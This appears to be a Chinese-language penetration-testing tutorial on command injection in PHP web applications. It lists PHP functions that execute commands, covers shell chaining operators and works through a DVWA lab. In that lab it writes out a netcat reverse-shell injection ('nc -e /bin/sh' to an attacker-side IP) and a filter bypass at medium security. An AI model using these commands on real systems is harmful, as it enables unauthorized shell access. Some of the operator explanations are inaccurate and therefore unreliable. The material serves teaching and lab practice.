渗透测试之命令执⾏
⼀、命令执⾏介绍
  命令执⾏漏洞就是⿊客可以直接在web应⽤中执⾏系统命令,从⽽获取敏感信息或者拿下shell权限。⼆、命令执⾏原理
  由于代码过滤不严格导致⽤户提交的数据被解析执⾏⽽造成的漏洞。
三、命令执⾏类型
  1.系统命令执⾏漏洞:传⼊系统命令
   2.PHP代码执⾏漏洞:传⼊PHP代码
四、命令执⾏函数
  1.常⽤系统命令执⾏函数:
    system("")
    exec("")
    passthru("")
    ``反引号与shell_exec()
    popen()
    proc_open()
    $env
   2.常⽤PHP代码执⾏函数:
    eval()    assert()  preg_repace()
   3.防御命令执⾏函数
    escapeshellarg()  escapeshellcmd()
   4.系统命令执⾏漏洞拼接符
    |    只执⾏第⼆个命令
    ||    先执⾏第⼀个命令若成功则继续执⾏第⼆个命令
    &    不管第⼆个命令是否执⾏成功都会执⾏第⼆个命令
    &&    必须两个命令都成功才执⾏
    ;    类似&
=========================================================================
 四、命令执⾏实验
  打开DVWA,设置security level:low
  正常⽤户操作应该如下:php如何运行代码
  但是,由于开发的时候代码过滤不严谨,造成了⿊客可以通过⾮法输⼊执⾏未授权命令。如下:通过命令拼接,我们可以执⾏OS命令,说明这⾥存在命令执⾏漏洞。
  漏洞利⽤,我们可以注⼊⼀个反向连接的命令。
  ⾸先,使⽤netcat监听端⼝命令: nc -vv  -l -p 8080 
  注⼊命令:nc -e /bin/sh 192.168.164.128 8080  地址为我们本机的地址
  看⼀下监听结果:
  成功连接,并且执⾏系统命令。
我们将security level设置为medium,然后发现它只是过滤了; && & ||这些命令拼接符,但并没有过滤 | 所以上⾯步骤仍然有效。==================================================================================================总结:
如何避免命令注⼊漏洞?
1)尽量不适⽤哪些⽐较危险的⽅法函数
2)执⾏命令之前⼀定要使⽤过滤且避免遗漏,可以设置⽩名单的⽅式。输⼊之前,严格分析。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。